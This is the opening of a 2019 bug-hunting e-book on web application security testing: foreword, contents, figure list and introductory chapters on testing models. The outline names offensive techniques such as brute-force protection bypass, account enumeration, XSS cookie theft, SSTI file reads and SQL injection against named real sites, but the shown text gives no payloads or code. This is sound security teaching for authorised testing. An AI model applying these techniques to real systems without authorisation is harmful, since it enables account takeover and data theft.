
Weather | i

BUG HUNTING 101

(Web Application Security)

40+ examples of real cases with various techniques

40,000+ USD have been paid

Equipped with basic explanations

By: Yoko Kho and Faisal Yudo Hernawan, 2019

- FIRST EDITION -

Bug Hunting 101 - First Edition free | https://alfursan.id


Web Application Security Testing Al-Fursan Cybersecurity Learning Resources

FOREWORD

In the name of Allah, the Most Gracious, the Most Merciful.

Praise be to Allah subhanahu wa ta'ala. We praise Him, seek His help, and ask His forgiveness. We seek refuge in Allah from the evil of our own souls and from our bad deeds. Whoever Allah Subhanahu wa Ta'ala guides, none can mislead, and whoever He misleads, none can guide. We testify that none has the right to be worshipped but Allah alone, with no partner, and we bear witness that Muhammad is His slave and His Messenger.

With the help of Allah, Alhamdulillah, after nearly one year, the first edition of this electronic book on web application security testing is finally complete.

Briefly, this book is intended to guide testers (both newcomers and those who have been in the field for some time) on certain tips and tricks for finding vulnerabilities or bugs, in support of the bug hunting activities they are involved in. In preparing it, we tried to summarize various references from researchers (both domestic and foreign) and sort them according to a learning pattern we expect to be effective.

It should be noted that the things described in this book were prepared and developed based on our experience and observations while working in this field. This means the analysis results may change along with future developments.

Nevertheless, God willing, we will always strive to present test steps that are suitable to apply, and continue to make improvements and add material to cover the shortcomings of this book. So, look out for the next version.

Writers: Yoko Kho and Faisal Yudo Hernawan, 2019

Personal Blog: http://firstsight.me

Linkedin: https://id.linkedin.com/in/config & https://id.linkedin.com/in/faisal-yudo-hernawan

Twitter: https://twitter.com/YoKoAcc & https://twitter.com/jrs_faisal

Medium: https://medium.com/@YoKoKho & https://medium.com/@FaisalYudo


Document History

Version   Date                                   Summary                                              Initials
0.1       October 14, 2019 / 15 Safar 1441 H     Bug Hunting 101 (Web Application Security) - First edition   WAST 101

Compiled By

Name                     Role
Yoko Kho                 Author
Faisal Yudo Hernawan     Author
Azhar Abdussami          Research team
Tomi Ashari              Research team


TABLE OF CONTENTS

FOREWORD .......... ii
Document History .......... iii
Compiled By .......... iii
Table of Contents .......... iv
List of Figures .......... xi
ABSTRACT .......... xviii
CHANGELOG .......... xix
1. INTRODUCTION .......... 1
1.1. Background .......... 1
1.2. Scope .......... 3
2. SECURITY TESTING VIEWPOINT .......... 4
2.1. Vulnerability Assessment .......... 6
2.2. Penetration Test .......... 7
2.3. Security Assessment .......... 8
2.4. Bug Hunting (Responsible Disclosure / Bug Bounty Program / etc.) .......... 9
3. APPROACH GUIDES .......... 11
4. BASIC TEST SUMMARY .......... 13
4.1. Conclusions on the Use of the Basic Test Summary Method .......... 19
5. RECONNAISSANCE .......... 20
5.1. Finding the Sub-Domains of a Target .......... 21
5.1.1. Reverse IP Lookup Method (Use of the Same Server) .......... 21
5.1.2. Sub-Domain Enumeration with Automation Tools .......... 23
5.2. Viewing the State of the Target Sub-Domains .......... 27
5.2.1. Directory / File Brute Force .......... 27
5.2.2. Directory / File Brute Force Part II - Web Crawling .......... 29
5.3. Conclusion of the Basic Reconnaissance Phase .......... 29
5.4. Reconnaissance References .......... 30
6. SUB-DOMAIN TAKEOVER .......... 31


6.1. The Basics of Sub-Domain Takeover .......... 31
6.2. Basic Concepts of Sub-Domain Takeover .......... 31
6.3. Impact of Sub-Domain Takeover .......... 35
6.4. Execution Steps of Sub-Domain Takeover .......... 35
6.4.1. Execution of External Pointing (External TLD Name) - Nokia Case .......... 37
6.4.2. Execution of External Pointing (Third Party Content Provider) .......... 39
6.4.3. Execution of Second Order Domain .......... 42
6.5. Sub-Domain Takeover References .......... 43
7. WEB APPLICATION TRAFFIC INTERCEPTOR & FORWARDER TOOLS .......... 45
7.1. Why a Traffic Interceptor and Forwarder is Needed .......... 45
7.2. Installing the JRE and Running Burp Suite .......... 47
7.3. Intercepting Traffic Data on Web-Based Applications - HTTP .......... 50
7.4. Intercepting Traffic Data on Web-Based Applications - HTTPS .......... 53
7.5. Reference for Installing the Burp Suite CA on Multiple Browsers .......... 56
8. BASIC CONCEPT OF THE HTTP GET AND POST METHODS .......... 57
9. INFORMATION DISCLOSURE VIA SEARCH ENGINE .......... 59
9.1. Technique Discussion - First Case - Yammer Case .......... 60
9.2. A Glimpse of Google Dorks .......... 62
9.3. Technique Discussion - Second Case - PayPal Case .......... 63
9.4. Technique Discussion - Third Case - Trello Case .......... 66
9.5. Preventing Crawling Bots from Indexing Sensitive Items .......... 69
9.6. Information Disclosure via Search Engine References .......... 70
ACCOUNT AND PASSWORD MECHANISM .......... 71
10. BRUTE FORCE ATTACK - CHECK FOR WEAK LOCK OUT MECHANISM .......... 72
10.1. Simple Meaning of Brute Force .......... 72
10.2. Why Accounts and Passwords? - Google Case .......... 72
10.3. Common Usernames and Passwords .......... 73
10.4. Basic Brute Force Attack (Kinds of Brute Force Attack) .......... 74
10.4.1. Basic Brute Force Attack Part I - Direct Attack to Password .......... 74


10.4.2. Basic Brute Force Attack Part II - Page Redirection .......... 81
10.4.3. Basic Brute Force Attack Part III - Numbers as Payload - Facebook Case .......... 85
10.4.4. Basic Brute Force Attack Part IV - Two or More Payloads .......... 87
10.4.5. Basic Brute Force Attack Part V - Encode the Payload - HTTP Basic Authentication .......... 90
10.5. Bypassing Brute Force Protection (Kinds of Brute Force Bypass) .......... 96
10.5.1. Bypass Method Part I - Bypassing CAPTCHA Protection .......... 96
10.5.1.1. CAPTCHA Definitions .......... 96
10.5.1.2. Common Request with CAPTCHA .......... 97
10.5.1.3. Example of Bypassing CAPTCHA - Veris Case .......... 98
10.5.1.3.1. Burp Suite - Repeater Mode .......... 100
10.5.2. Bypass Method Part II - Adding a Custom Header - Dashlane Case .......... 102
10.5.3. Bypass Method Part III - Check the Mobile Request - Instacart Case .......... 103
10.5.4. Bypass Method Part IV - Check the API - Asus Case .......... 104
10.6. Brute Force Attack References .......... 107
11. CHECK FOR ACCOUNT (LOGIN) ENUMERATION .......... 109
11.1. Common Login Identities in Applications .......... 109
11.2. Basic Account Enumeration .......... 110
11.2.1. Account Enumeration via Login Form - Veris Case .......... 110
11.2.2. Account Enumeration via Forgot Password Feature - Infogram Case .......... 111
11.2.3. Account Enumeration via Resend Confirmation Feature - Xoom Case .......... 112
11.2.4. Account Enumeration by Using a Search Engine - Xoom Case .......... 114
11.2.5. Account Enumeration via Sign Up Feature - HackerOne Case .......... 116
11.3. Check for Account Enumeration References .......... 116
12. COMMON ACCOUNT AND PASSWORD CHECKING .......... 118
12.1. Password Complexity Checking .......... 118
12.1.1. Password Complexity Check via Registration Feature .......... 118
12.1.2. Password Complexity Check via the Change Password Feature .......... 119
12.1.3. Password Complexity Check via the Change Password Feature from the Reset Password .......... 119
12.1.4. Password Complexity Check via the Use of Specific Characters .......... 120


12.2. Minimum Password Length Checking .......... 120
12.3. Minimum Password History Checking .......... 121
12.4. Maximum Password Age .......... 122
12.5. Change Password on First Use .......... 122
12.6. References for Common Account and Password Checking .......... 122
SESSION MANAGEMENT MECHANISM .......... 124
13. SESSION MANAGEMENT .......... 125
13.1. Session is not Expired - HackerOne and WakaTime Case .......... 125
13.2. Cookie Attributes Not Yet Set Up .......... 126
13.2.1. A Few Words about Using Cookies to Log In .......... 126
13.2.2. A Few Words about the "Secure" Flag / Attribute on Cookies .......... 126
13.2.2.1. Check for "Secure" Flag in Cookie Attributes - IRCCloud and Gratipay Case .......... 126
13.2.3. A Few Words about the "HttpOnly" Flag / Attribute on Cookies .......... 128
13.2.3.1. Check for "HttpOnly" Flag in Cookie Attributes - Qiwi and Concrete5 Case .......... 128
13.3. Unexpired Reset Password Link .......... 129
13.3.1. Unexpired Reset Password Link - Never Used - Veris Case .......... 129
13.3.2. Used Reset Password Link Never Expires - WakaTime Case .......... 130
13.3.3. 1st Reset Password Link Not Expired after Using the 2nd Link - Few Cases .......... 130
13.3.4. Reset Password Link Not Expired after Changing Email Address - WakaTime Case .......... 131
13.4. Session Management References .......... 131
INPUT VALIDATION .......... 133
14. CROSS SITE SCRIPTING (XSS) .......... 134
14.1. Kinds of Cross Site Scripting .......... 135
14.1.1. Reflected Cross Site Scripting .......... 135
14.1.2. Stored Cross Site Scripting .......... 136
14.1.3. DOM-Based Cross Site Scripting .......... 138
14.2. Basic Concept of Cross Site Scripting Attack .......... 139
14.3. Sample Cases .......... 140
14.3.1. Reflected Cross Site Scripting - Shopify Case .......... 140


14.3.2. Stored Cross Site Scripting - Snapchat Case .......... 142
14.3.3. Blind Cross Site Scripting - Tokopedia Case .......... 144
14.3.4. DOM-Based Cross Site Scripting - Twitter Case .......... 146
14.4. Cross Site Scripting References .......... 148
15. CONTENT INJECTION .......... 150
15.1. Basic Concept of Content Injection .......... 150
15.2. Kinds of Content Injection .......... 151
15.2.1. Text Injection - SEMRush and LocalTapiola Case .......... 151
15.2.2. HTML Injection .......... 152
15.2.2.1. Common HTML Injection - Infogram Case .......... 152
15.2.2.2. HTML Injection (Output Triggered via Email) - Slack Case .......... 153
15.3. Content Injection References .......... 154
16. SERVER SIDE TEMPLATE INJECTION (SSTI) .......... 155
16.1. Server Side Template Injection 101 .......... 155
16.1.1. Detection .......... 156
16.1.2. Identification .......... 157
16.1.3. Exploitation .......... 158
16.2. Server Side Template Injection - Uber Case .......... 161
16.3. Server Side Template Injection - Intel Case .......... 163
16.4. Server Side Template Injection with TPLmap .......... 164
16.5. Server-Side Template Injection References .......... 166
17. HOST HEADER INJECTION (HHI) .......... 167
17.1. Kinds of Host Header Injection .......... 168
17.2. Host Header Injection - Redirection - Whisper Case .......... 168
17.3. Host Header Injection - Account Takeover - The Concept .......... 169
17.3.1. Host Header Injection - Account Takeover - Mavenlink Case .......... 171
17.4. Host Header Injection References .......... 171
18. SQL INJECTION .......... 173
18.1. Kinds of SQL Injection .......... 174


18.1.1. Error Based SQL Injection .......... 174
18.1.2. Blind SQL Injection .......... 175
18.1.3. Union-Based SQL Injection .......... 178
18.2. Basic Concept of SQL Injection Attack .......... 178
18.3. Sample Cases .......... 179
18.3.1. Error Based SQL Injection - Bootcamp.Nutanix.com Case .......... 179
18.3.2. Common Blind SQL Injection Attack - Zomato Case .......... 181
18.3.3. Blind SQL Injection Attack via User-Agent - Private Program .......... 182
18.3.4. Time Based SQL Injection - Starbucks Program .......... 186
18.3.5. Simple SQL Injection to Bypass Login Form - Sample from Mutillidae II .......... 189
18.3.6. Error Based SQL Injection with Page Redirection - Private Program .......... 191
18.4. Automated SQL Injection with SQLMap (Basic Use) .......... 193
18.4.1. How to Use SQLMap .......... 194
18.4.1.1. Basic Concept .......... 194
18.4.1.2. Using SQLMap via Direct Command .......... 195
18.4.1.3. Using SQLMap via Saved Files .......... 198
18.4.2. Brief Summary - SQLMap .......... 200
18.5. SQL Injection References .......... 200
CLOSING OF THE FIRST EDITION .......... 202
CLOSING .......... 203
BIBLIOGRAPHY .......... 204
0x01. Reconnaissance .......... 204
0x02. Sub-Domain Takeover .......... 204
0x03. Web-Based Application Data Traffic Interceptors and Forwarders .......... 205
0x04. Basic Concepts of the HTTP GET and HTTP POST Methods .......... 205
0x05. Information Disclosure via Search Engine .......... 206
0x06. Brute Force Attack .......... 206
0x07. Check for Account Enumeration .......... 207
0x08. References for Common Account and Password Checking .......... 208


0x09. Cross Site Scripting .......... 208
0x10. Content Injection .......... 209
0x11. Server-Side Template Injection .......... 209
0x12. Host Header Injection .......... 210
0x13. SQL Injection .......... 210


LIST OF FIGURES

Figure 1 Top Data Compromised Varieties .......... 2
Figure 2 Actors and Motives in Breaches .......... 2
Figure 3 Best Practices / Frameworks .......... 4
Figure 4 End-to-End Security Testing Point of View .......... 4
Figure 5 Threat Source and Motivation .......... 5
Figure 6 Types of Testing .......... 6
Figure 7 Vulnerability Assessment I - Pic. from Akamai .......... 6
Figure 8 Vulnerability Assessment II - Pic. from Akamai .......... 7
Figure 9 Web Application Security Assessment .......... 11
Figure 10 Reverse IP Lookup with "You Get Signal" .......... 22
Figure 11 Sub-Domain Search Page on VirusTotal .......... 23
Figure 12 Found 100+ Sub-Domains .......... 24
Figure 13 Example of Simple Enumeration Results .......... 25
Figure 14 Comparison Table of Sub-Domain Enumeration Tools .......... 26
Figure 15 A Few of the Sub-Domains at bitdefender.com .......... 26
Figure 16 Scanning is Completed .......... 28
Figure 17 General Flow of Communication - https://0xpatrik.com/subdomain-takeover-basics/ .......... 31
Figure 18 Example of Pointing to an External Domain .......... 33
Figure 19 Example of Pointing to a 3rd Party Content Provider - https://hackerone.com/reports/121461 .......... 34
Figure 20 Sample Identification of a Second-Order Sub-Domain .......... 34
Figure 21 Output of "dig" for the Sub-Domain nstring2qa.nokia.com .......... 35
Figure 22 Example of Output when Viewing cname_output.txt .......... 37
Figure 23 List of CNAME Output .......... 37
Figure 24 Dig Result for nstring2qa.nokia.com .......... 38
Figure 25 Domain is Available I .......... 38
Figure 26 Domain is Available II .......... 38
Figure 27 CloudFront Not Yet Configured .......... 40
Figure 28 CloudFront Distributions - Create .......... 40


Figure 29 "Get Started" in the "Web" Section of CloudFront Distributions ... 40
Figure 30 Origin Settings ... 41
Figure 31 Entering jobs.ycombinator.com as the CNAME ... 41
Figure 32 Configuration has been Saved ... 41
Figure 33 Sub-Domain Takeover - Proof of Concept ... 42
Figure 34 Sub-domains belonging to Example.com ... 42
Figure 35 Second Order Sub-Domain - https://0xpatrik.com/second-order-bugs/ ... 43
Figure 36 Common Flow of a Phone Credit (Pulsa) Purchase Confirmation ... 45
Figure 37 Common Flow of a Phone Credit (Pulsa) Purchase Confirmation - with a Traffic Interceptor ... 46
Figure 38 Burp Suite Community Edition ... 47
Figure 39 JRE Download - Search Keyword on Google ... 48
Figure 40 Oracle's Official JRE Download Page ... 48
Figure 41 JRE has been Installed ... 49
Figure 42 Burp Suite has Started ... 49
Figure 43 Burp Suite is Running ... 50
Figure 44 Turning Off Intercept Mode ... 50
Figure 45 "Proxy Listeners" Menu ... 51
Figure 46 "Preferences" and "Settings" Menus ... 51
Figure 47 Proxy Settings ... 52
Figure 48 Capturing Traffic via Burp Suite ... 52
Figure 49 Connection Failed ... 53
Figure 50 Accessing http://burp ... 53
Figure 51 Download CA Certificate ... 54
Figure 52 "Certificates" Menu in Firefox ... 54
Figure 53 Importing Burp Suite's Certificate into the Browser ... 54
Figure 54 Trusting the Certificate in the Browser ... 55
Figure 55 "View Certificates" in the Browser ... 55
Figure 56 Opening Google with Burp Suite's Certificate ... 55
Figure 57 HTTPS Traffic has been Successfully Intercepted ... 56


Figure 58 Sample of the GET Method ... 57
Figure 59 Sample Request with the GET Method ... 57
Figure 60 Sample Login Form with the POST Method ... 58
Figure 61 Sample Request with the POST Method ... 58
Figure 62 XML Displayed on Access ... 61
Figure 63 Accessing Another User's Account ... 62
Figure 64 Trying to Retrieve Another User's Information ... 64
Figure 65 Trying to Enumerate Invoices ... 65
Figure 66 Example of One Accessed Invoice ... 66
Figure 67 Information Disclosure via Google Dork - Intext Dork I ... 67
Figure 68 Information Disclosure via Google Dork - Intext Dork II ... 67
Figure 69 Information Disclosure via Google Dork - Bug Fixing ... 68
Figure 70 Information Disclosure via Google Dork - Sensitive Credentials I ... 68
Figure 71 Information Disclosure via Google Dork - Sensitive Credentials II ... 68
Figure 72 POST Method - Username and Password ... 75
Figure 73 "Send to Intruder" ... 75
Figure 74 Intruder Menu - "Target" Tab ... 76
Figure 75 "Payload Positions" ... 76
Figure 76 Removing the Highlight with "Clear §" ... 77
Figure 77 Highlighting the "Pass" Parameter ... 77
Figure 78 Adding a "Word" Manually ... 78
Figure 79 Adding Passwords Automatically from a File ... 78
Figure 80 Passwords Successfully Added ... 79
Figure 81 Example of a File Containing Passwords ... 79
Figure 82 Starting the Attack with "Start Attack" ... 79
Figure 83 Automated Brute Force Attack ... 80
Figure 84 Success Log of the Brute Force Results ... 81
Figure 85 Username and Password are Valid ... 81
Figure 86 "Redirections" Option in Burp Suite ... 82


Figure 87 Response after Setting Page Redirection ... 82
Figure 88 Example of a Simple Flow ... 83
Figure 89 Response Length - Failed and Successful ... 83
Figure 90 Clicking to Sort ... 84
Figure 91 Example of a Failed Response - "Login Failed" in the Body ... 84
Figure 92 Example of a Failed Login - "Failed" in the Response Body ... 84
Figure 93 Changing the "Payload Type" to Numbers ... 85
Figure 94 Entering the "Number Range" in "Payload Options" ... 86
Figure 95 Brute Force Attack - "Numbers" as Payloads ... 86
Figure 96 Request of the Login Activity ... 87
Figure 97 Number of Payload Sets ... 88
Figure 98 "Payload Set" 1 - Setting up the Username List ... 88
Figure 99 "Payload Set" 2 - Setting up the Password List ... 89
Figure 100 Sample Request with Two Payload Sets ... 89
Figure 101 Sample Request ... 90
Figure 102 Highlighting the Base64 Parameter ... 91
Figure 103 Setting the Payload Type to Custom Iterator ... 92
Figure 104 Adding the Password and Separator ... 92
Figure 105 List of Passwords ... 93
Figure 106 "Payload Processing" Feature ... 93
Figure 107 Adding a Payload Processing Rule - Encode to Base64 ... 94
Figure 108 Encode to Base64 ... 94
Figure 109 Normal - With "=" ... 95
Figure 110 Removing the "=" ... 95
Figure 111 Parameter Encoded to Base64 ... 95
Figure 112 Decode Result - Burp Suite ... 96
Figure 113 Sample CAPTCHA by Google ... 97
Figure 114 Sample Request with g-recaptcha-response ... 98
Figure 115 Request with g-recaptcha-response ... 99


Figure 116 Request without g-recaptcha-response ... 99
Figure 117 Removing the g-recaptcha-response - https://hackerone.com/reports/124173 ... 100
Figure 118 Sending the Request to Repeater ... 100
Figure 119 Repeater Interface ... 101
Figure 120 Many Tabs to be Analyzed ... 101
Figure 121 Attempt Blocked by Dashlane ... 102
Figure 122 Bypassing Brute Force Protection at Dashlane - https://hackerone.com/reports/225897 ... 103
Figure 123 CAPTCHA on the Asus Portal ... 104
Figure 124 API ID in the Asus VivoBaby Mobile Application ... 105
Figure 125 API Endpoints in the Asus VivoBaby Mobile Application ... 105
Figure 126 Login Endpoint - Belonging to Asus ... 105
Figure 127 Trying to Log in via the Asus API ... 106
Figure 128 Failed Login - Response Length 752 - Failed ... 106
Figure 129 Successful Login - Response Length 1106 - Valid ... 107
Figure 130 Entering the Email in the Login Form ... 110
Figure 131 Invalid Username - Failed Response ... 111
Figure 132 Resend Email Feature ... 112
Figure 133 Account Enumeration Process via "Resend Confirmation Email" ... 113
Figure 134 Account not Found - Invalid Email ... 114
Figure 135 Information Disclosure via Search Engine - Email Enumeration ... 115
Figure 136 Information Disclosure via Search Engine - Email Enumeration ... 115
Figure 137 Simple Steps Conducted by Wdem ... 119
Figure 138 Password Complexity Not Enforced when Changing the Password via the Reset Password Feature ... 119
Figure 139 Bypassing Password Complexity with Blank Spaces ... 120
Figure 140 Bypassing the Minimum Password Length Policy ... 120
Figure 141 Bypassing the Minimum Password Length Policy II ... 121
Figure 142 Running the "Edit This Cookie" Extension ... 127
Figure 143 Cookie Attributes at HackerOne ... 127
Figure 144 Cookie Flags / Attributes Not Yet Set ... 128


Figure 145 XSS Statistics (OWASP and Rapid7) ... 134
Figure 146 Sample Attack - Reflected XSS via a Malicious Email ... 136
Figure 147 Simple Explanation of Stored XSS ... 138
Figure 148 Sample Flow of DOM-Based XSS ... 139
Figure 149 Pop-Up Alert Sample ... 140
Figure 150 Output from the Triggered Script ... 141
Figure 151 Output from the Triggered Script - document.cookie ... 141
Figure 152 Trying to Inject a Simple HTML Script ... 142
Figure 153 Inviting Another Member ... 142
Figure 154 Script Reflected via Email ... 143
Figure 155 Script Reflected on the Page (and Stored in the Database) ... 143
Figure 156 Domain Information Reflected via JavaScript ... 144
Figure 157 Trying to Inject the XSS Hunter Script in the Name Field ... 145
Figure 158 Dashboard Notification in XSS Hunter ... 145
Figure 159 Internal Dashboard of Tokopedia - Shown via Blind XSS ... 146
Figure 160 Script Executed on the Client Side Using a DOM-Based Vulnerability ... 148
Figure 161 Sample of Content Injection with Text ... 150
Figure 162 Text Injection at SEMRush Program - https://hackerone.com/reports/327671 ... 151
Figure 163 Text Injection at LocalTapiola - https://hackerone.com/reports/181594 ... 152
Figure 164 HTML Injection at Infogram - https://hackerone.com/reports/283742 ... 153
Figure 165 HTML Injection in First Name - Triggered in Email ... 153
Figure 166 SSTI Methodology - SSTI: RCE for Modern Web App by PortSwigger ... 156
Figure 167 Use of Wappalyzer ... 156
Figure 168 Use of the BuiltWith Tool ... 157
Figure 169 Decision Tree to Identify Template Engines - by James Kettle ... 158
Figure 170 Template Injection Cheat Sheets ... 159
Figure 171 Template Injection at Uber ... 161
Figure 172 Dumping Classes via SSTI ... 162
Figure 173 Trying to Execute Python Code ... 162


Figure 174 Trying to Insert the Payloads ... 163
Figure 175 The Intel Application Responded to the Input ... 163
Figure 176 Reading /etc/passwd via SSTI ... 164
Figure 177 Sample Request ... 167
Figure 178 Modifying the Host Header from Whisper.sh to Crowdshield.com ... 169
Figure 179 Sample Host Header Injection ... 170
Figure 180 Sample Logs on the Assessor's Server ... 170
Figure 181 Bypassing Host Header Injection Protection ... 171
Figure 182 SQL Injection Rank from Akamai and OWASP ... 173
Figure 183 Trying to Inject the Parameters ... 179
Figure 184 Trying to Find the SQL Version ... 180
Figure 185 SQL Injection Automation with SQLMap ... 181
Figure 186 Normal Response - Without a Single Quote ... 183
Figure 187 Unauthorized Response after Injecting the User-Agent ... 183
Figure 188 Injecting with "True" Payload - Success ... 184
Figure 189 Injecting with "False" Payload - Success ... 184
Figure 190 Injection Attempt to Find the Database Name ... 185
Figure 191 Trial of a Time-Based SQL Injection Attack ... 186
Figure 192 The Application Did Not Sleep ... 187
Figure 193 Found the DBMS Version ... 188
Figure 194 Time-Based SQL Injection with SQLMap ... 188
Figure 195 Sample Injection at the Login Form ... 189
Figure 196 Successful Login ... 189


ABSTRACT

It should be noted that the authors and everyone else involved in producing this e-book distance themselves from any use of this writing or knowledge for purposes that fall outside the shari'ah. Everything described here is intended to give an overview and/or instruction to colleagues who need it in their daily life or work. If a reader applies it in a way that conflicts with the shari'ah, that is not the responsibility of the authors or the team. May the knowledge learned here be used as well as possible, for justified purposes.

What do testers or bug hunters actually do when testing an application? What do they actually consider when looking at an application, or even when first hearing the name of the application or target? What information is needed to test a target optimally? Which kinds of vulnerabilities are accepted by the owner? What methodology is used to test an application? What should be looked at first when seeing an application? Are there tools that make testing easier?

The authors have encountered more than a few questions like these from colleagues who want to start learning in the security field, particularly the testing of web-based applications. On the other hand, some of the same questions are also raised by fellow professional testers who want to move into the realm of bug hunting.

With hope and the blessing of God, and having seen this situation, the authors have tried to create a guide that may give an overview to all colleagues who need it, whether fellow professionals or beginners, and whether for personal use or for an organization.

In writing it, the authors have also included some simple descriptions of the formal testing models that are generally carried out, such as Vulnerability Assessment, Penetration Test, or Security Assessment.

A brief note: earlier, the first version of this e-book was given to one organization that needed an overview of testing an application. However, considering how many positive things it could, InsyaAllah, offer to the general public, the authors took the initiative to release it publicly after editing it and adding some basic material to broaden the discussion.

In the future, God willing, the authors will continue to develop and improve this work so that it can become a comprehensive reference for testing.

0.1. CHANGELOG

First Edition:

Broadly speaking, this first edition contains the common foundation required for testing a web-based application. Given the current situation, the discussion in this edition does not yet go deeply into steps for manipulating an application's flow.

God willing, in the next edition the authors will discuss various case examples related to testing models that involve manipulating a process flow in an application, accompanied by a variety of interesting methodologies.

As outlined, the topics discussed in this edition consist of:

• A general introduction to security testing models, including bug hunting in relation to responsible disclosure and bug bounty programs;
• The basic concepts of gathering information on a target to be tested;
• Sub-domain takeover;
• Why an interceptor and forwarder are needed in testing;
• The basic concepts of the HTTP GET and POST methods; and
• Testing steps related to sensitive data exposure via Google dorks, the account and password mechanism, session establishment mechanisms, and input validation.


1. PRELIMINARY

This guide is organized as one of the references that testers are expected to use in order to understand the general flow of a test, or to carry out bug hunting against web-based applications, with the aim of identifying vulnerabilities that could potentially disrupt the confidentiality, integrity, and availability of the application concerned.

It also includes problem-solving notes and general references that can be used as a foundation for a test, or as a reference in developing other testing techniques.

1.1. Background

There is no denying that at present quite a few industries make the data of each of their users the main content that drives their business. One real-life example is that many social media companies no longer have difficulty creating content, because most of it comes from registered users. On the other hand, it is not uncommon to find an airline ticket provider that does not need to own an aircraft, an e-commerce company that does not require a physical store, or an online transport company that does not need to own the vehicles it rents out. In fact, Daniel Burrus presents an interesting fact in one of his essays: "Airbnb offers more rooms than the biggest worldwide hotel chains and yet owns no property." Yes, Airbnb offers more rooms than the largest hotel chains available, and the most unique thing is that Airbnb owns no property. In other words, property belonging to its users is the "thing" being offered.

With more and more business lines accommodating detailed and massive amounts of user data, the emergence of various information security problems that may cause material and reputational harm can no longer be avoided.

Based on Verizon's independent "2018 Data Breach Investigations Report", personal data is the data most often stolen when a breach occurs across various industries (with 730 cases per year), followed by payment information (562 cases per year), medical data (505 cases per year), and user credentials (about 154 cases per year).

As a note, each case may involve a massive data leak, varying from thousands to millions of records.


Figure 1 Top Data Compromised Varieties

In practice, the same report also states that the actors behind a breach may consist of various groups, such as external parties, internal parties, and partners.

Figure 2 Actors and Motives in Breaches

Looking at the data presented by Verizon, as well as similar independent reports, all of this "may" of course be a trigger for every line of business to attempt to optimize its data security, whether through process changes, technology implementation, or by seeking testing services.

In implementation, testing in this security context can itself be interpreted quite variously, from closed testing services such as formal security testing (whether penetration testing, security assessment, or red teaming) to open testing services such as running a responsible disclosure program (with or without rewards).

In reality, unfortunately, conditions are not favorable for answering the needs of existing industry lines. As presented by ISACA in "State of Cybersecurity 2019", as quoted by BusinessWire, 32% of respondents state that it takes about six months or more to fill cybersecurity-related positions in their organizations. In other words, the supply of cybersecurity talent is still somewhat inadequate for current market conditions.

Given this situation, the authors hope that this guide may be one means for colleagues who want to learn a good testing model, both for closed testing (formal security testing) and especially for open testing (such as responsible disclosure programs, with or without rewards).

1.2. Scope

As noted earlier, the scope of discussion in this guide focuses on security testing activities against web-based applications.

For brief information, in formal testing activities (such as a Penetration Test, Security Assessment, and so on), the testing concept is of course advised to be carried out end-to-end from both the internal and external areas, each of which covers the black box, gray box, and white box realms.

As for bug hunting activities, the testers must of course follow every rule given by the program owner, both the scope and the types of vulnerabilities that are accepted (which is of course based on the risk of each).


2. SECURITY TESTING POINT OF VIEW

This manual was prepared from several internationally recognized references, combined with the authors' varied experience. As for implementation, some of the adopted references include the following:

Figure 3 Best Practices / Frameworks

In implementation, each testing activity should also be equipped with a testing point of view detailing both the external and internal areas, each divided into three: Black Box, Gray Box, and White Box.

Figure 4 End-to-End Security Testing Point of View


Here, the points of view have the following meanings:

• Black Box: the test is carried out in a situation where the tester does not have an account to log in to the application, and has no access to the network or the asset under test other than what an ordinary visitor (of the application) or guest would have.

• Gray Box: the test is carried out in a situation where the tester already has some access that visitors in general do not have, for example when a visitor has access as a user (customer / client).

• White Box: the test is carried out with the highest access in each area. Examples are testing from the standpoint of the server administrator (with administrator privileges), from the standpoint of the application administrator (with permissions such as super administrator), and from the standpoint of the database administrator (with direct access to the database). The simple core of it is to make sure that no layer can enter another layer without a purpose that is properly laid down in the rules.

With these various references, coupled with the various testing points of view (both external and internal), this guide is also expected to go further toward its goal of optimizing the identification of risk.

Figure 5 Threat Source and Motivation


As for implementation, there is no denying that there is considerable confusion in determining the particular type of security testing activity, since these activities have test patterns and durations that vary. As a simple note, the things that are generally used to decide which type of activity to use lie in the security maturity of a company and the company's needs in identifying the risks contained in it.

Figure 6 Types of Tests

Broadly speaking, there are three types of technical activity that are quite well known among information security practitioners, namely Vulnerability Assessment, Penetration Test, and Security Assessment.

2.1. Vulnerability Assessment

Based on the explanation from Akamai and many other competent sources, a Vulnerability Assessment is specifically an activity characterized by testing tied to the use of an automated vulnerability scanner. In it, the tester will try to validate each result reported by the scanner and provide follow-up in order to issue valid recommendations.

Figure 7 Vulnerability Assessment I - Pic. from Akamai


Figure 8 Vulnerability Assessment II - Pic. from Akamai

However, this test activity cannot be the primary gauge, because it is considered less able to identify risk to the maximum. Besides dwelling in the realm of the signatures owned by each automated vulnerability scanner, this activity is also considered less able to test the business flow that is usually expressed in the application's implementation.

Based on these considerations, many refer to the test activity one level above it, namely the Penetration Test.

2.2. Penetration Test

In contrast to the vulnerability assessment, penetration test activities are more likely to have a specific purpose, such as whether or not a target can be taken over.

This activity is not necessarily glued to the results of an automated vulnerability scanner or to a checklist. In a way, this test activity will try to simulate the various types of attacks that are commonly used to get into a system.

In its application, the tester will be able to use more than one type of vulnerability (which may be a simple chaining of multiple vulnerabilities) to achieve one main goal, which is taking over the targeted system.

However, this test activity ultimately cannot be considered 100% the main reference when a company / organization wants to see the risk that exists within it. Based on this deeper need, a risk-based test model was finally proposed, which is generally known as the Security Assessment.


2.3. Security Assessment

The concept promoted by the Security Assessment is quite simple, namely:

• When a system is said to be at risk, it is likely that the system has a vulnerability (even if only at a low level). However, being vulnerable does not mean that a tester can get into the system.

• When a tester has successfully entered the system, it can be ascertained that the system is indeed vulnerable (though possibly requiring a combination of several kinds of vulnerability). However, entering the system does not mean that the tester has successfully demonstrated a risk (especially to the business), because there is a possibility that the system that was penetrated is already no longer in use.

It should be noted that the risks discussed in this topic relate to the three main components of information security, namely confidentiality, authenticity, and availability.

In a security assessment, a tester will try to maximize testing from various points of view in order to identify the potential risks that may arise.

A simple example that is often discussed to clarify this case relates to the circulation of photographs of celebrities who used Apple's iCloud service, around 2014. Many say that Apple was compromised at that time; however, Apple was never compromised in that situation. In fact, the attacker actually took advantage of an Apple vulnerability in which login attempts against the iCloud service were not restricted (no limitation of login attempts), allowing an attacker to perform password brute force as much as desired against a valid username.

Examination of idle session termination, password history settings, password age settings, and similar things are all among the points generally considered in a Security Assessment.

On the other hand, when a tester has successfully entered the system, the tester must examine every possibility that could pose another potential risk in it, such as checking for passwords stored in the browser, the storage of sensitive documents, a database connection string that is still readable in plaintext in the configuration, and so on.

The common thread is that a tester must ensure that data which is not meant to be read even by the manager of the database (such as the database administrator) is stored in the database in a protected form, so that it cannot be read without the protection applied by the database administrator being removed.


